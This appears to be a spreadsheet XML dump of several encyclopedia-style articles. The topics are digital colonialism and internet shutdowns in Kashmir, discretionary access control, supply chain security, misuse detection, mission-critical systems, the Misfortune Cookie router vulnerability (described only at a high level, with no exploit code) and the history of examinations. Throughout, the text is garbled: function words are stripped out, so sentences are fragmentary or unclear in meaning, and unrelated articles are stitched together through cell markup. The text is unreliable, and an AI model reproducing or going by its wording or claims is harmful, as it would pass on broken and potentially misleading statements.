critics contended colonized peoples could attain cultural, economical, social agency oppressive structures representation imposed lives societies.however, temporality, preface "post" implies historical period colonization ended, colonized subjects free discourses. scholars focalized continuity colonialism even historically ended. neo-colonial structures discourses already part different "postcolonial" cultures. postcolonial colonized countries gained independence autonomy means populace regain self-determination freedom. yet, neo-colonial structures still rampant postcolonial societies. although nation-state might forward idea autonomy self-determination, forms colonialism always emerging. this dialectic colonialism self-determination encompasses range fields, changing form, focus, scope time. reflected complex political policy relationships "postcolonial" peoples state, especially since states replicating legal political systems former colonizer. history articulates state policy fields diverse health, education, housing, public works, employment, justice had, continue have, negative effects indigenous peoples independence. this negative effect shared throughout former colonized peoples. alongside political tensions, economic interests manipulated legal governance frameworks extract value resources former colonized territories, often without adequate compensation consultation impacted individuals communities. accordingly, digital colonialism emerges dominant discourse digital sphere. digital colonialism structural form domination exercised centralized ownership control three core pillars digital ecosystem: software, hardware, network connectivity. control latter three gives giant corporations immense political, economic, social power individuals, even nation-states. assimilation tech products, models, ideologies foreign powers constitutes colonization internet age.today, form corporate colonization taking place. instead conquest land, tech corporations colonizing digital technology. following functions dominated handful multinational companies: search engines (google); browsers (google chrome); smartphone tablet operating systems (google android, apple ios); desktop laptop operating systems (microsoft windows); office software (microsoft office, google docs); cloud infrastructure services (amazon, microsoft, google, ibm); social networking platforms (facebook, twitter); transportation (uber, lyft); business networking (microsoft linkedin); streaming video (google youtube, netflix, hulu); online advertising (google, facebook) among others. these include five wealthiest corporations world, combined market exceeding trillion. nation-state integrates tech products society, multinational corporations obtain enormous power economy create technological dependencies lead perpetual resource extraction. this resembles colonial period colonies made dependent colonizer's economy exploitation. under digital colonialism, digital infrastructure global south engineered tech companies' needs, enabling economic cultural domination imposing privatized forms governance. accomplish task, major corporations design digital technology ensure dominance critical functions tech ecosystem. this allows accumulate profits revenues derived rent; exercise control flow information, social activities, plethora political, social, economic, military functions technologies. digital colonialism depends code. code: other laws cyberspace, lawrence lessig famously argued computer code shapes rules, norms, behaviors computer-mediated experiences. result, "code law" sense power usurp legal, institutional, social norms impacting political, economic, cultural domains society. this critical insight applied fields like copyright, free speech regulation, internet governance, blockchain, privacy, even torts. this similar architecture physical space colonialism. building infrastructures built reinforce dominance reach colonialism."postcolonial" peoples, then, face multiple digital limitations access networked digital infrastructures. latter threatens reflect restructure existing relations social inequality grounded colonialism continuing processes neo-colonialism. indigenous peoples acutely aware potential, working various partners decolonize digital sphere. they undertaking variety projects represent diverse localized experiences, alongside common desire self-determination. rural remote indigenous communities face persistent access problems digital associated historic ongoing effects colonialism. remote indigenous communities becoming 'offline design' going online challenged. indigenous peoples asserting digital self-determination using platforms build online communities, express virtual identities, represent culture virtually. hence, longer static offline, becoming 'networked individualism'. their engagement digital sphere resists imposed representations identities deterritorializes conceptions virtual communities. accordingly, former colonized peoples always engaged process decolonizing latent neo-/colonial discourses dominating internet. digital apartheid digital apartheid also concept debates around digital self-determination. authors christian fuchs, digital apartheid means "certain groups regions world systematically excluded cyberspace benefits create."brown czerniewicz (2010), drawing research project interrogating access higher education students south africa information communications technology (ict), highlight generational aspects characteristic digital divides, latter rather question access opportunity, claiming present "digital apartheid alive well."borrowing graham (2011), extending representation conditions surrounding higher education post-apartheid south africa, ashton (2018) highlight concept digital apartheid multidimensional process three dimensions material dimension (including access infrastructure, device, cellular coverage, electricity), skills dimension (including education legacy regarding computer training, social capital regard family/community computer skills), virtual dimension (including language, culture contextual relevance). authors argue "the virtual dimension emerges intentional 'digital redlining' takes number forms. guise protecting organisation spam illicit, harmful cyber-attacks, secondary outcome blocking filtering communities access cheaper portals." also includes influence westernised, english internet influences content visibility. skills dimension emerges understanding lessons part curriculum recently therefore skill development remained underexposed restricted. authors refer material dimension cited concern regarding introducing technology part curriculum, arguing "the lack power infrastructure lower socio-economic areas exorbitant data costs, impact students' ability access learning resources."since 2019, concept signifying advantages dispossession others also used characterize internet shutdowns communications blockades jammu kashmir. region, contested claimed india pakistan entirety site active armed conflict, witnessed indian state imposing total communication blackout internet shutdown jammu kashmir intervening night august 2019 part unilateral measures remove semi-autonomous nature disputed territory jammu kashmir. speed internet restored january 2020 high speed internet restored february 2021. 2019 report notes 2012 2019, internet shutdowns region. india also topped list countries disrupted access internet people year 2020. report access highlighted, "india instituted become perpetual, punitive shutdown jammu kashmir beginning august 2019. residents states previously experienced frequent periodic shutdowns, 2020 deprived reliable, secure, open, accessible internet ongoing basis." placing frequent shutdowns context ongoing conflict kashmir, report kashmir's internet siege (2020) jammu kashmir coalition civil society argues frequent internet shutdowns, indian government enacting regions "digital apartheid," form systemic pervasive discriminatory treatment collective punishment." according report, "frequent prolonged internet shutdowns enact profound digital apartheid systematically structurally depriving people kashmir means participate highly networked digitised world."this systematic censorship deprivation resulted excluding people, collectively, participating cyberspace, evident, crippled companies startups kashmir. noted affected least thousand employees working sector third month world's longest internet shutdown began intervening night august 2019 across jammu kashmir. statement, special rapporteurs referred communication blackout collective punishment without pretext precipitating offence. "the shutdown internet telecommunication networks, without justification government, inconsistent fundamental norms necessity proportionality," experts said. news report quoting story entrepreneur well startup noted "internet oxygen start-ups. centre pulled plug august virtual world space growth. that's gone. employees producers rendered jobless [..] work hook crook meet damage inflicted loss customers, undelivered orders accumulated goods non-availability internet." june 2020, reported first time non-local companies able majority contracts online mining mineral blocks, locals left disadvantage high speed internet.the effect digital apartheid also witnessed lockdown induced covid-19 pandemic leaving healthcare infrastructure crippled doctors complained able access information attend trainings coronavirus owing restricted internet. president doctors association noted awareness drives carried elsewhere virus impossible kashmir. want educate people videos, possible speed. handicapped absence high speed internet." health experts locals warned internet blackout hampering fight coronavirus region. internet shutdown also affected education across levels region. news reports noted kashmiri education left behind even life elsewhere moving online dealing stay-at-home guidelines pandemic. news report year communication blackout subsequent restriction high-speed internet highlighted "ravaged health, education, entrepreneurship" region. regulating digital self-determination legal landscape promoting concepts rights closely related digital self-determination common goal behind regulatory initiatives various legal systems. stemming conceptual framework human rights, well-established notion informational self-determination, digital self-determination gradually comes play increasingly important role concept encompasses values virtues remain highly relevant context global network society, autonomy, dignity, freedom. importance embedding fundamental values legislative frameworks regulating digital sphere stressed numerous times scholars, public authorities, representatives various organizations. eu's legal policy, explicitly referencing right digital self-determination, pursues closely related objectives. overarching premises european digital strategy encourage development trustworthy technology "works people". aims advancing, among things, "</t>
  </si>
  <si>
    <t>Template:Onion defunct</t>
  </si>
  <si>
    <t>{{{1}}}.onion (defunct)</t>
  </si>
  <si>
    <t>Discretionary access control</t>
  </si>
  <si>
    <t>computer security, discretionary access control (dac) type access control defined trusted computer system evaluation criteria means restricting access objects based identity subjects and/or groups belong. controls discretionary sense subject certain access permission capable passing permission (perhaps indirectly) subject (unless restrained mandatory access control)." discretionary access control commonly discussed contrast mandatory access control (mac). occasionally, system whole said "discretionary" "purely discretionary" access control system lacks mandatory access control. hand, systems implement simultaneously, refers category access controls subjects transfer among other, refers second category access controls imposes constraints upon first. implementations meaning term practice clear-cut definition given tcsec standard, tcsec definition impose implementation. there least implementations: owner widespread example) capabilities. with owner term commonly used contexts assume every object owner controls permissions access object, probably many systems implement using concept owner. tcsec definition anything owners, technically access control system concept ownership meet tcsec definition dac. users (owners) implementation ability make policy decisions and/or assign security attributes. straightforward example unix file mode represent write, read, execute bits user, group others. prepended another indicates additional characteristics). with capabilities another example, capability systems sometimes described providing discretionary controls permit subjects transfer access subjects, even though capability-based security fundamentally restricting access "based identity subjects". general, capability systems allow permissions passed subject"; subject wanting pass permissions must first access receiving subject, subjects generally access strictly limited subjects consistent principle least privilege. also references citations sources</t>
  </si>
  <si>
    <t>Digital supply chain security</t>
  </si>
  <si>
    <t>digital supply chain security refers efforts enhance cyber security within supply chain. subset supply chain security focused management cyber security requirements information technology systems, software networks, driven threats cyber-terrorism, malware, data theft advanced persistent threat (apt). typical supply chain cyber security activities minimizing risks include buying trusted vendors, disconnecting critical machines outside networks, educating users threats protective measures take. acting deputy undersecretary national protection programs directorate united states department homeland security, greg schaffer, stated hearing aware instances malware found imported electronic computer devices sold within united states. examples supply chain cyber security threats network computer hardware delivered malware installed already. malware inserted software hardware various means) vulnerabilities software applications networks within supply chain discovered malicious hackers counterfeit computer hardware related u.s. government efforts comprehensive national cyber initiative defense procurement regulations: noted section national defense authorization international strategy cyberspace: white house lays first time u.s.’s vision secure open internet. strategy outlines three main themes: diplomacy, development defense.diplomacy: strategy sets “promote open, interoperable, secure reliable information communication infrastructure” establishing norms acceptable state behavior built consensus among nations. development: through strategy government seeks “facilitate cybersecurity capacity-building abroad, bilaterally multilateral organizations.” objective protect global infrastructure build closer international partnerships sustain open secure networks. defense: strategy calls government “will ensure risks associated attacking exploiting networks vastly outweigh potential benefits” calls nations investigate, apprehend prosecute criminals non-state actors intrude disrupt network systems. related government efforts around world russia: russia non-disclosed functionality certification requirements several years recently initiated national software platform effort based open-source software. this reflects apparent desire national autonomy, reducing dependence foreign suppliers. india: recognition supply chain risk draft national cybersecurity strategy. rather targeting specific products exclusion, considering indigenous innovation policies, giving preferences domestic suppliers order create robust, globally competitive national presence sector. china: deriving goals 11th five year plan (2006–2010), china introduced pursued security-focused aggressive indigenous innovation policies. china requiring indigenous innovation product catalog used government procurement implementing multi-level protection scheme (mlps) requires (among things) product developers manufacturers chinese citizens legal persons, product core technology components must independent chinese indigenous intellectual property rights. private sector efforts slsa (supply-chain levels software artifacts) end-to-end framework ensuring integrity software artifacts throughout software supply chain. requirements inspired google’s internal "binary authorization borg" past years mandatory google's production workloads. goal slsa improve state industry, particularly open source, defend pressing integrity threats. with slsa, consumers make informed choices security posture software consume. other references financial sector information sharing analysis center international strategy cyberspace (from white house) nstic safecode whitepaper trusted technology forum open trusted technology provider standard (o-ttps) cyber supply chain security solution malware implants firmware supply chain software information communications technology supply chain risk management task force: interim report also supply chain supply chain risk management supply chain security iso/pas 28000 nist trustworthy computing references</t>
  </si>
  <si>
    <t>Misuse detection</t>
  </si>
  <si>
    <t>misuse detection actively works potential insider threats vulnerable computer data. misuse misuse detection approach detecting computer attacks. misuse detection approach, abnormal system behaviour defined first, behaviour defined normal. stands anomaly detection approach utilizes reverse: defining normal system behaviour first defining behaviour abnormal. with misuse detection, anything known normal. example misuse detection attack signatures intrusion detection system. misuse detection also used generally refer kinds computer misuse. theory theory, misuse detection assumes abnormal behaviour simple-to-define model. advantage simplicity adding known attacks model. disadvantage inability recognize unknown attacks. references further reading information misuse detection, including papers written subject, consider following: misuse detection concepts algorithms article iit.</t>
  </si>
  <si>
    <t>Mission critical</t>
  </si>
  <si>
    <t>mission critical factor system factor (component, equipment, personnel, process, procedure, software, etc.) essential business operation organization. failure disruption mission critical factors result serious impact business operations upon organization, even cause social turmoil catastrophes. mission critical systems mission critical system system essential survival business organization. when mission critical system fails interrupted, business operations significantly impacted. mission essential equipment mission critical application also known mission critical system. examples mission critical systems are: online banking system, railway/aircraft operating control systems, electric power systems, many computer systems adversely affect business society fail. good example mission critical system navigational system spacecraft. difference mission critical business critical lies major adverse impact real possibilities loss life, serious injury and/or financial loss.there four different types critical systems: mission critical, business critical, safety critical security critical. difference safety critical system mission critical system, safety critical system system that, fails, result serious environmental damage, injury, loss life, mission critical system result failure goal-directed activity. example safety critical system chemical manufacturing plant control system. mission critical system business critical system similar terms, business critical system fault influence single company organization partially stop lifetime activity (hours days). also used mission critical system business. failure cause high cost loss business. security critical system lead loss sensitive data theft accidental loss. four systems generalized critical system.as rule crisis management, triage-type decision made certain components must eliminated delayed, e.g. resource personnel constraints, mission critical ones must among them. examples every business companies organizations mission critical systems functioning. downed filtration system cause water filtration company malfunction. case, water filtration system mission critical system. system downed, many restaurants bakeries shut system functions well again. case, system mission critical system. there various mission critical systems that, malfunction, serious impacts industries organizations. navigating system aircraft aircraft highly dependent navigating system. navigation accomplished many methods. dead reckoning utilizes visual checkpoints along distance time calculations. flight computer system aids pilots calculate time distance checkpoint set. radio navigation (navaids) enables pilots navigate accurately dead reckoning alone, conditions visibility, radio navigation handy. also used pilots uses u.s. department defence satellites provide precise locational data, includes speed, position, track.if two-way radio communication malfunctions, pilots follow steps title code federal regulations cfr) part pneumatic system failure, associated loss altitude, various unfamiliar situations cause stress loss situational awareness. case, pilot instruments navigators seek information situational data. case, malfunction navigation system would mission critical would cause serious consequences. nuclear reactor safety system nuclear reactor system controls contains sustained nuclear chain reaction. usually used generating electricity, also used conducting research producing medical isotopes. nuclear reactors concerning systems public safety worldwide malfunction nuclear reactor cause serious disaster. controlling nuclear reactor system accomplished stopping, decreasing, increasing chain reaction inside nuclear reactor. varying water level vertical cylinder moving adjuster rods methods controlling chain reaction reactor operating. temperatures, reactor power levels, pressure constantly monitored sensitive detectors. history mission critical business's quintessence failed, cause serious financial reputational damages. today, companies develop world becomes web-based community, range mission critical extended. mission critical computing evolving since pre-web (before 1995). entirely text-based pre-web internet, gopher ascii-based end-user programs. mission critical system basically used transactional applications era. business process management software, erp, airline reservation systems usually mission critical. these applications dedicated system data center. there limited number users usually accessed terminals personal computers.after pre-web era, (1995 2010) rose. range mission critical increased include electronic devices applications. more users able internet electronic devices, larger number users able access increased mission critical applications. therefore, customers expecting limitless availability stronger security devices using. businesses also start become web-based correspondingly increases criminal associated money fraud. this increase range mission critical made security become stronger increased security industries. between 1995 2010, number users globally increased million billion. this shows increase global reliance system.after era, consumerization (2010 beyond) risen. range mission critical even increased increase social, mobile, customer-facing applications. consumerization became greater, organizations increased availabilities people increased. social business, customer service, customer support applications increased greatly, mission critical expanded further. according gartner, native projects outnumbered mobile development projects ratio 4:1. therefore, today's mission critical encloses subjects crucial customer based service, business operation, employee productivity, finance. customers' expectations rose small disruption cause tremendous loss business. estimated amazon could lost much $1,100 second sales suffering outage, five-minute outage google lost google $545,000. failure mission critical even short time outage cause high price downtime reputations damages. longer periods downtime mission critical systems result even serious problems industries organizations. safety security mission critical systems remain secured industries organization using therefore, industries using various security systems avoid mission critical failures. mainframes workstations based companies dependent database process control, database process control would mission critical them. hospital patient recording, call centers, stock exchanges, data storage centers, flight control tower, many industries dependent communication system computer protected shutdown system considered mission critical. companies industries unavoidable unexpected extraordinary problems cause shutdown mission critical. avoid this, using safety systems considered important part business. transport layer security (tls) transport layer security (tls; formerly, secure socket layers, ssl) refers standard security technology networking protocol controls manages client server authentication, encrypt communication. this usually used online transaction websites paypal bank america, systems downed hacked, cause serious problems society companies themselves. tls, public-key symmetric-key (encryption) used together secure connection machines. usually utilized mail services client machines communicates internet. technology, server requires digital certificate obtained completing several questions identity website public keys private keys (cryptographic keys). industries using technology also required certain amount money annually. shutdown systems nuclear power plants need safety systems avoid mission-critical failures. worst possible consequence result leakage radioactive materials (u-235 pu-239). systems avoid mission critical failures nuclear power plants shutdown system. different forms: controls safety injection control. when problem occurs nuclear power plant, control shutdown system drops rods automatically stops chain reaction. safety injection control injects liquid immediately system faces problem nuclear reactor stops chain reaction. both systems usually automatically operated, also manually activated. real time mission critical real time mission critical often confused many people concept. real time real time responsiveness computer makes computer continually update external processes, process procedure information specified time, could result serious consequences. video games examples real time since rendered computer rapidly, hard notice delay user. each frame must rendered short time maintain experience interactivity. speed rendering graphics vary according computer systems. types real time systems hard real-time system miss specified time result serious consequences. non-negotiable timing "wrong answer" deadline missed. example hard real time system airbags cars. soft real-time system loose deadline. system handle problems functions normally even though deadline missed, functionality depends fast-paced processes. example soft-real time typing, which, delayed, people annoyed, answer still correct. real-time system certain absolute deadlines. however, throughput activity performance still essential. differences real time software specific time met, fails, mission critical system failed, result catastrophic consequences. although hand-in-hand, since real time mission critical, concepts. these often confused many people, different concepts, associated other. mission critical personnel mission critical systems planning social survival from perspective social function (i.e.: preserving society's life support structure, overall structure intact), mission critical aspects social function would necessitate provision basic needs society. such basic needs often said include food (this includes food production distribution), water, clothing (not immediate need emergency), sanitation (sewage immediate need, physical waste/garbage/rubbish disposal immediate need emergency), housing/shelter, energy (not immediate) health needs (not immediate healthy population). prior list exhaustive. longer term needs might include communications/transport needs developed population. this list needs associated mission critical personnel clear manner food production requires farmers, food distribution requires transportation personnel, water requires water-infrastructure maintenance personnel long term requirement existing water infrastructure maintained high standard), clothing tends require individuals maintain clothes production infrastructure, similarly sanitation. emergencies, housing/shelter requires someone build shelter maintain long term necessary. health needs doctors, nurses surgeons. implicit infrastructure requires personnel maintain infrastructure also food transportation requires drivers food trucks, also (over long term) highways maintenance personnel maintain roads, traffic infrastructure signs roads, turn requires power supply personnel provide power traffic lights, etc... light, mission critical systems (like mission critical systems) complex dependency network enables analysis level interconnected dependencies different aspects mission critical system, useful planning, gaining truthful picture mission criticality organised complex systems. this would enable determination 'choke points' complex system, points mission critical system systems) vulnerable sense another. ideas relate human resources human resources planning (making gantt charts project management, etc...) also relevant. mission criticality depends upon timescale associated basic needs deemed mission critical factors. over medium term (often taken years) long term (which 50-60 year timescales), planning mission critical systems clearly differ short-term mission critical systems planning. mission critical personnel considered part mission critical systems planning paradigm require different approach technological mechanical aspects mission critical systems (i.e.: require human resources planning). attributes mission critical personnel psychometrics enables determination characterisation various psychological aspects mission critical personnel (e.g.: case highly skilled work, nuclear physics, example). some jobs require physical standards (for instance, army), physical dexterity (e.g.: surgeons). there exist methods means characterising types skills, qualities attributes certain mission critical roles require, used benchmarks determining whether certain individuals well suited particular mission critical role, assistance less qualified even less capable) individual would need performing certain mission critical role might beyond abilities (such measures might taken emergency situations). also life-critical system critical infrastructure protection downtime references</t>
  </si>
  <si>
    <t>Misfortune Cookie (computers)</t>
  </si>
  <si>
    <t>misfortune cookie computer software vulnerability found firmware certain network routers leveraged attacker gain access remotely. vulnerability detected affected around million unique devices spread across countries, earning tyne cvss rating. device connected exposed network could hijacked attacker could easily monitor person's internet connection steal credentials well personal business data. they could also attempt infect target machines malware. otherwise known cve-2014-9222, first discovered 2014 check point researchers. returned 2018, four years public disclosure, time, affecting completely different targets, medical devices. when vulnerability applied medical attacks, configurations could tampered with, communication could spoofed, information could stolen unsuspecting person. exploitation with combination severity, ease exploiting, lack practically preconditions sheer volume affected networks, misfortune cookie could considered truly unique. vulnerability easy exploit attacker gain access device send single packet device's public address. exploitation could carried modern-day browser making even dangerous security vulnerabilities. attacker scenario sends crafted http cookie attribute vulnerable system's (network router) web-management portal, attacker's content overwrites device memory. contents cookie command router abides commands. this results arbitrary code execution. this vulnerability discovered early 2000s emerge publicly 2014, security researchers israeli security firm checkpoint made public disclosure. vulnerability still persists million devices accessible internet total million devices. this includes around different router brands. 2018, vulnerability gained traction vulnerable firmware used medical equipment could potentially cause life-threatening attacks iot. severity highlighted ics-cert advisory, thereby. references</t>
  </si>
  <si>
    <t>Test (assessment)</t>
  </si>
  <si>
    <t>examination (exam evaluation) test educational assessment intended measure test-taker's knowledge, skill, aptitude, physical fitness, classification many topics (e.g., beliefs). test administered verbally, paper, computer, predetermined area requires test taker demonstrate perform skills. tests vary style, rigor requirements. there general consensus invariable standard test formats difficulty. often, format difficulty test dependent upon educational philosophy instructor, subject matter, class size, policy educational institution, requirements accreditation governing bodies. test administered formally informally. example informal test reading test administered parent child. formal test might final examination administered teacher classroom test administered psychologist clinic. formal testing often results grade test score. test score interpreted regards norm criterion, occasionally both. norm established independently, statistical analysis large number participants. test developed administered instructor, clinician, governing body, test provider. instances, developer test directly responsible administration. example, educational testing service (ets), nonprofit educational testing assessment organization, develops standardized tests directly involved administration proctoring tests. history oral informal examinations informal, unofficial, non-standardized tests testing systems existed throughout history. example, tests skill archery contests existed china since zhou dynasty (or, mythologically, yao). oral exams administered various parts world including ancient china europe. precursor later chinese imperial examinations place since dynasty, confucian characteristic examinations determined. however examinations offer official avenue government appointment, majority filled recommendations based qualities social status, morals, ability. china standardized written examinations first implemented china. they commonly known imperial examinations (keju). bureaucratic imperial examinations concept origins year short lived dynasty. successor, tang dynasty, implemented imperial examinations relatively small scale examination system extensively expanded reign zetian. included expanded examination system military exam tested physical ability, military exam never significant impact chinese officer corps military degrees seen inferior civil counterpart. exact nature wu's influence examination system still matter scholarly debate. during song dynasty emperors expanded examinations government school system, part counter influence hereditary nobility, increasing number degree holders four five times tang. from song dynasty onward, examinations played primary role selecting scholar-officials, formed literati elite society. however examinations co-existed forms recruitment direct appointments ruling family, nominations, quotas, clerical promotions, sale official titles, special procedures eunuchs. regular higher level degree examination cycle decreed 1067 years triennial cycle existed nominal terms. practice this, examinations irregularly implemented significant periods time: thus, calculated statistical averages number degrees conferred annually understood context. jinshi exams yearly event considered annual average figures necessary artifact quantitative analysis. operations examination system part imperial record keeping system, date receiving jinshi degree often biographical datum: sometimes date achieving jinshi firm date known even historically prominent persons chinese history. brief interruption examinations occurred beginning mongol yuan dynasty 13th century, later brought back regional quotas favored mongols disadvantaged southern chinese. during ming qing dynasties, system contributed narrow focused nature intellectual life enhanced autocratic power emperor. system continued modifications abolition 1905 last years qing dynasty. modern examination system selecting civil servants also indirectly evolved imperial one. spread japan japan implemented examination system years heian period (794-1185). like chinese examinations, curriculum revolved around confucian canon. however, unlike china, ever applied minor nobility gradually faded away hereditary system samurai era. korea examination system established korea reign gwangjong goryeo. free (not nobi) able take examinations. joseon period, high offices closed aristocrats passed exams. examination system continued 1894 abolished gabo reform. china, content examinations focused confucian canon ensured loyal scholar bureaucrat class upheld throne. vietnam confucian examination system vietnam established 1075 dynasty emperor nhân tông lasted nguyễn dynasty emperor khải định (1919). there three levels examinations vietnam: interprovincial, pre-court, court. west imperial examination system known europeans early 1570. received great attention jesuit matteo ricci (1552–1610), viewed confucian appeal rationalism favorably comparison religious reliance "apocalypse." knowledge confucianism examination system disseminated broadly europe following latin translation ricci's journal 1614. during 18th century, imperial examinations often discussed conjunction confucianism, attracted great attention contemporary european thinkers gottfried wilhelm leibniz, voltaire, montesquieu, baron d'holbach, johann wolfgang goethe, friedrich schiller. france britain, confucian ideology used attacking privilege elite. figures voltaire claimed chinese "perfected moral science" françois quesnay advocated economic political system modeled chinese. according ferdinand brunetière (1849-1906), followers physiocracy françois quesnay, whose theory free trade based chinese classical theory, sinophiles bent introducing "l'esprit chinois" france. also admits french education really based chinese literary examinations popularized france philosophers, especially voltaire. western perception china 18th century admired chinese bureaucratic system favourable european governments seeming meritocracy. however admired china christian wolff sometimes persecuted. 1721 gave lecture university halle praising confucianism, accused atheism forced give position university.the earliest evidence examinations europe date 1215 1219 bologna. these chiefly oral form question answer, disputation, determination, defense, public lecture. candidate gave public lecture prepared passages assigned civil canon law, doctors asked questions, expressed objections answers. evidence written examinations appear 1702 trinity college, cambridge. according michael sadler, europe written examinations since 1518 admits "evidence clear." prussia, medication examinations began 1725. mathematical tripos, founded 1747, commonly believed first honor examination, james bass mullinger considered "the candidates really undergone examination whatsoever" qualification degree merely four years residence. france adopted examination system 1791 result french revolution collapsed years. germany implemented examination system around 1800.englishmen 18th century eustace budgell recommended imitating chinese examination system first english person recommend competitive examinations qualify employment adam smith 1776. 1838, congregational church missionary walter henry medhurst considered chinese exams "worthy imitating." 1806, british established civil service college near london training east india company's administrators india. this based recommendations british east india company officials serving china seen imperial examinations. 1829, company introduced civil service examinations india limited basis. this established principle qualification process civil servants england. 1847 1856, thomas taylor meadows strongly recommended adoption chinese principle competitive examinations great britain desultory notes government people china. according meadows, "the long duration chinese empire solely altogether owing good government consists advancement talent merit only." both thomas babington macaulay, instrumental passing saint helena 1833, stafford northcote, earl iddesleigh, prepared northcote–trevelyan report catalyzed british civil service, familiar chinese history institutions. northcote–trevelyan report 1854 made four principal recommendations: recruitment basis merit determined standardized written examination, candidates solid general education enable inter-departmental transfers, recruits graded hierarchy, promotion achievement, rather 'preferment, patronage, purchase'.when report brought parliament 1853, lord monteagle argued implementation open examinations chinese system china "enlightened country." lord stanley called examinations "chinese principle." earl granville deny argued favor examination system, considering minority manchus able rule china years. 1854, edwin chadwick reported noblemen agree measures introduced chinese. examination system finally implemented british indian civil service 1855, prior admission civil service purely matter patronage, england 1870. even late years competitive examination plan passed, people still attacked "adopted chinese culture." alexander baillie-cochrane, baron lamington insisted english "did know necessary take lessons celestial empire." 1875, archibald sayce voiced concern prevalence competitive examinations, described "the invasion chinese culture."after great britain's successful implementation systematic, open, competitive examinations india 19th century, similar systems instituted united kingdom itself, western nations. like british, development french american civil service influenced chinese system. when thomas jenckes made report joint select committee retrenchment 1868, contained chapter civil service china. 1870, william spear wrote book called oldest newest empire-china united states, urged united states government adopt chinese examination system. like britain, many american elites scorned plan implement competitive examinations, considered foreign, chinese, "un-american." result, civil services reform introduced house representatives 1868 passed 1883. civil service commission tried combat sentiments report: ...with intention commending either religion imperialism china, could fact enlightened enduring government eastern world acquired examination merits candidates office, deprive american people advantage, might advantage, facts confucius taught political morality, people china read books, used compass, gunpowder, multiplication table, centuries continent wilderness, deprive people conveniences. modern development standardized testing began influence method examination british universities 1850s, oral exams norm since middle ages. transition happened influence educational reformer horace mann. shift helped standardize expansion curricula sciences humanities, creating rationalized method evaluation teachers institutions creating basis streaming students according ability.both world world demonstrated necessity standardized testing benefits associated tests. tests used determine mental aptitude recruits military. army used stanford–binet intelligence scale test soldiers. after war, industry began using tests evaluate applicants various jobs based performance. 1952, first advanced placement (ap) test administered begin closing high schools colleges. contemporary tests education tests used throughout educational systems. tests range brief, informal questions chosen teacher major tests students teachers spend months preparing for. some countries united kingdom france require secondary school students take standardized test individual subjects general certificate secondary education (gcse) england) baccalauréat respectively requirement graduation. these tests used primarily assess student's proficiency specific subjects mathematics, science, literature. contrast, high school students countries united states required take standardized test graduate. moreover, students countries usually take standardized tests apply position university program typically given option taking different standardized tests sat, used primarily measure student's reasoning skill. high school students united states also take advanced placement tests specific subjects fulfill university-level credit. depending policies test maker country, administration standardized tests done large hall, classroom, testing center. proctor invigilator also present testing period provide instructions, answer questions, prevent cheating. grades test scores standardized test also used universities determine whether student applicant admitted academic professional programs. example, universities united kingdom admit applicants undergraduate programs based primarily solely applicant's grades pre-university qualifications a-levels cambridge pre-u. contrast, universities united states applicant's test score many admission criteria determine whether applicant admitted undergraduate programs. criteria case include applicant's grades high school, extracurricular activities, personal statement, letters recommendations. once admitted, undergraduate students united kingdom united states required respective programs take comprehensive examination requirement passing courses graduating respective programs. standardized tests sometimes used certain countries manage quality educational institutions. example, child left behind united states requires individual states develop assessments students certain grades. practice, assessments typically appear form standardized tests. test scores students specific grades educational institution used determine status educational institution, i.e., whether allowed continue operate receive funding. finally, standardized tests sometimes used compare proficiencies students different institutions countries. example, organisation economic co-operation development (oecd) uses programme international student assessment (pisa) evaluate certain skills knowledge students different participating countries. licensing certification standardized tests sometimes used certain governing bodies determine whether test taker allowed practice profession, specific title, claim competency specific skills. example, test taker intends become lawyer usually required governing body governmental licensing agency pass exam. immigration naturalization standardized tests also used certain countries regulate immigration. example, intended immigrants australia legally required pass citizenship test part country's naturalization process. language testing naturalization process when analyzed context language texting naturalization processes, ideology found distinct nearly related points. refers construction deconstruction nation's constitutive elements makes identity, second restricted view notion specific language ideologies served specific purpose. intelligence quotient competitions tests sometimes used tool select participants potential succeed competition sporting event. example, serious skaters wish participate figure skating competitions united states must pass official u.s. figure skating tests qualify. group memberships tests sometimes used group select certain types individuals join group. example, mensa international high-iq society requires individuals score 98th percentile higher standardized, supervised test. types assessment types include: formative assessments informal formal tests taken learning process. these assessments modify later learning activities, improve student achievement. they identify strengths weaknesses help target areas need work. goal formative assessment monitor student learning provide ongoing feedback used instructors improve teaching students improve learning. summative assessments evaluate competence instructional unit, goal determining candidate assimilated knowledge skills required standard. summative assessments cover days' instruction, entire term's work cases final exams, even multiple years' study, case high school exit exams, advanced level examples, professional licensing tests united states medical licensing examination. learning ways different every student habits same. norm-referenced tests compare student's performance national "norm" group. only certain percentage test takers best worse scores. norm-referencing usually called grading curve comparison group students classroom. norm-referenced tests report whether test takers performed better worse hypothetical average student, determined comparing scores performance results statistically selected group test takers, typically grade level, already taken exam. criterion-referenced tests designed measure student performance fixed criteria learning standards. possible test takers pass, like possible test takers fail. these tests individual's scores focus improving skills lacking comprehension. performance-based assessments require students solve real-world problems produce something real-world application. example, student demonstrate baking skills baking cake, outcome judged appearance, flavor, texture. authentic assessment measurement accomplishments worth compared multiple-choice standardized tests. example, authentic assessment arithmetic skills figuring much family's groceries cost week. this provides much information students' addition skills test question asks various numbers are. standardized tests tests administered scored consistent manner, regardless whether quick quiz created local teacher heavily researched test given millions people. standardized tests often used education, professional certification, psychology (e.g., mmpi), military, many fields. non-standardized tests flexible scope format, variable difficulty. example, teacher around classroom student different question. some questions inevitably harder others, teacher strict answers better students. non-standardized test used determine proficiency level students, motivate students study, provide feedback students, modify curriculum make appropriate either low- high-skill students. competitive examinations tests candidates ranked according grades and/or percentile rankers selected. examination open positions, first candidates ranks pass, others rejected. they used entrance examinations university college admissions joint entrance examination secondary schools. types civil service examinations, required positions public sector; u.s. foreign service exam, united nations competitive examination. competitive examinations considered egalitarian select worthy applicants without risking influence peddling, bias concerns. high-stakes tests tests important consequences individual test taker, getting driver's license. high-stakes test need high-stress test, test taker confident passing.a single test multiple qualities. example, exam aspiring lawyers norm-referenced, standardized, summative assessment. this means test takers higher scores pass, took test circumstances graded scoring standards, test meant determine whether school graduates learned enough practice profession. assessment formats written tests written tests tests administered paper computer eexam). test taker takes written test could respond specific items writing typing within given space test separate form document. tests; knowledge many constants technical terms required effectively answer questions, like chemistry biology test developer allow every test taker bring cheat sheet. test developer's choice style format developing written test usually arbitrary given single invariant standard testing. may, certain test styles format become widely used others. below list formats test items widely used educators test developers construct paper computer-based tests. result, tests consist type test item format (e.g., multiple-choice test, essay test) combination different test item formats (e.g., test multiple-choice essay items). multiple choice test items formatted multiple-choice questions, candidate would given number answers question, candidate must choose answer group answers correct. there families multiple-choice questions. first family known true/false question requires test taker choose answers appropriate. second family known one-best-answer question requires test taker answer list answers. there several reasons using multiple-choice questions 